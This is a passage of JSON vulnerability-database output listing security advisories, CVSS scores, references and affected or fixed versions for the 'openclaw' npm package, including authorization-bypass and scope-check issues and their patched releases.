N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:28:43Z/"}],"url":"https://github.com/openclaw/openclaw/commit/1c45123
231516fa50f8cf8522ba5ff2fb2ca7aea"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5jvj-hxmh-6h6j","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:28:43Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5jvj-hxmh-6h6j"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35657","reference_id":"CVE-2026-35657","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35657"},{"reference_url":"https://github.com/advisories/GHSA-5jvj-hxmh-6h6j","reference_id":"GHSA-5jvj-hxmh-6h6j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5jvj-hxmh-6h6j"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-http-session-history-route","reference_id":"openclaw-authorization-bypass-in-http-session-history-route","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:28:43Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-autho
rization-bypass-in-http-session-history-route"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113407?format=json","purl":"pkg:npm/openclaw@2026.3.25","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.25"},{"url":"http://public2.vulnerablecode.io/api/packages/998171?format=json","purl":"pkg:npm/openclaw@2026.3.28-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds
-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5
-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty
-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm
-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28-beta.1"}],"aliases":["CVE-2026-35657","GHSA-5jvj-hxmh-6h6j"],"risk_score":3.2,"exploitability":"0.5","weighted_severity":"6.4","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9uyu-y9qv-u7e1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90898?format=json","vulnerability_id":"VCID-9v6f-dbmk-jygq","summary":"Duplicate Advisory: Signal group allowlist authorization bypass via DM pairing-store leakage\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-wm8r-w8pf-2v6w. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.26 contain an authorization bypass vulnerability where Signal group allowlist policy incorrectly accepts sender identities from DM pairing-store approvals. 
Attackers can exploit this boundary weakness by obtaining DM pairing approval to bypass group allowlist checks and gain unauthorized group access.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/64de4b6d6ae81e269ceb4ca16f53cda99ced967a","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/64de4b6d6ae81e269ceb4ca16f53cda99ced967a"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8bdda7a651c21e98faccdbbd73081e79cffe8be0","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/8bdda7a651c21e98faccdbbd73081e79cffe8be0"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-dm-pairing-store-leakage-in-signal-group-allowlist","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X
/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-dm-pairing-store-leakage-in-signal-group-allowlist"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31991","reference_id":"CVE-2026-31991","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31991"},{"reference_url":"https://github.com/advisories/GHSA-r849-826x-wgqm","reference_id":"GHSA-r849-826x-wgqm","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r849-826x-wgqm"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wm8r-w8pf-2v6w","reference_id":"GHSA-wm8r-w8pf-2v6w","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wm8r-w8pf-2v6w"}],"fixed_packages":[],"aliases":["GHSA-r849-826x-wgqm"],"risk_score":1.6,"exploitability":"0.5","weighted_severity":"3.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9v6f-dbmk-jygq"},{"url":"
http://public2.vulnerablecode.io/api/vulnerabilities/89099?format=json","vulnerability_id":"VCID-9xgq-vtg2-jucq","summary":"## Impact\n\nOpenClaw `node.pair.approve` placed in `operator.write` scope instead of `operator.pairing` allows unprivileged pairing approval.\n\nThe pairing approval method accepted `operator.write` in place of both the narrower `operator.pairing` scope and the admin requirement for exec-capable nodes.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= v2026.04.01`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @nicky-cc of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42426","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12799","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12838","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12833","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42426"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:25:43Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-67mf-f936-ppxf","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvss
v3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:25:43Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-67mf-f936-ppxf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42426","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42426"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-improper-authorization-in-node-pair-approve-via-operator-write-scope","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:25:43Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-improper-authorization-in-no
de-pair-approve-via-operator-write-scope"},{"reference_url":"https://github.com/advisories/GHSA-67mf-f936-ppxf","reference_id":"GHSA-67mf-f936-ppxf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-67mf-f936-ppxf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd
-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42426","GHSA-67mf-f936-ppxf"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9xgq-vtg2-jucq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90304?format=json","vulnerability_id":"VCID-9xrt-mv81-3yc8","summary":"OpenClaw: Voice-call still parses large WebSocket frames before start validation (Incomplete fix for CVE-2026-32062)\n## Summary\nIncomplete fix for CVE-2026-32062: voice-call still parses large WebSocket frames before start validation\n\n## 